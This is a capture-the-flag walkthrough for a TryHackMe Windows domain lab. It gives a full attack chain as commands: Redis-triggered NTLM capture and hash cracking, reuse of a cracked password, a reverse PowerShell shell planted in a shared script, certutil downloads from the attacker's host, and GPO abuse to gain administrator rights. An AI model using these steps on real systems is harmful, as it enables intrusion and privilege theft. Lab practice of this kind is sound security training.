VulnNet: Active

Room Link: https://tryhackme.com/r/room/vulnnetactive

Scans

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/139 - NetBIOS

Kali

nbtscan $VICTIM

Kali

enum4linux $VICTIM

TCP/445 - SMB

No results. Couldn't login anonymously.

Kali

smbclient -L //$VICTIM/ 

TCP/6379 - Redis

Added active.thm

Kali

redis-cli -h active.thm

Kali(redis-cli)

config get *

Kali

responder -I ens5 -dvw  

Kali(redis-cli)

eval "dofile('//$KALI/share')" 0

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

TCP/445 - SMB

Kali

smbclient -L //$VICTIM/ -U enterprise-security
Password: sand_0873959498

Download files

Kali

smbclient \\\\$VICTIM\\Enterprise-Share -U enterprise-security
Password: sand_0873959498

Kali(smbclient)

ls
mget *

Kali

cat PurgeIrrelevantData_1826.ps1

Initial Shell

Kali

git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1

Kali(subl)

Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444

Kali

cp Invoke-PowerShellTcp.ps1 PurgeIrrelevantData_1826.ps1

Upload payload

Kali(smbclient)

put PurgeIrrelevantData_1826.ps1

After a few moments we get a connection

Kali

rlwrap nc -lvnp 4444

Privilege Escalation

Download SharpHound PS1

This failed because when running the script it would just hang and I had to reset the server. So After I tried with the exe.

Kali

git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.ps1 .
python2 -m SimpleHTTPServer 82

Victim(Powershell)

certutil -urlcache -f http://$KALI:82/SharpHound.ps1 SharpHound.ps1
powershell -ep bypass
.\SharpHound.ps1 

Download SharpHound EXE

Kali

git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.exe .
python2 -m SimpleHTTPServer 82

Victim(Powershell)

certutil -urlcache -f http://$KALI:82/SharpHound.exe SharpHound.exe
SharpHound.exe

Transfer results to Kali

Victim(Powershell)

copy 20240405092615_BloodHound.zip C:\Enterprise-Share\

Kali(smbclient)

get 20240405092615_BloodHound.zip

BloodHound

Kali #1

neo4j console

Kali #2

bloodhound --no-sandbox

We can just drag the zip file to bloodhound to import it.

Find Shortest Paths to Domain Admins

Our user enterprise-security has write access to the GPO called "SECURITY-POL-VN"

SharpGPOAbuse

Kali

git clone https://github.com/byronkg/SharpGPOAbuse.git
cp SharpGPOAbuse/SharpGPOAbuse-master/SharpGPOAbuse.exe .
python2 -m SimpleHTTPServer 82

Victim(Powershell)

certutil -urlcache -f http://$KALI:82/SharpGPOAbuse.exe SharpGPOAbuse.exe

This task is running one command which is to add our user enterprise-security to the administrator group

Victim(Powershell)

 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"

After the change is successful we just need to push the GPU for it to work.

Victim(Powershell)

 gpupdate /force

Kali

psexec.py enterprise-security:sand_0873959498@$VICTIM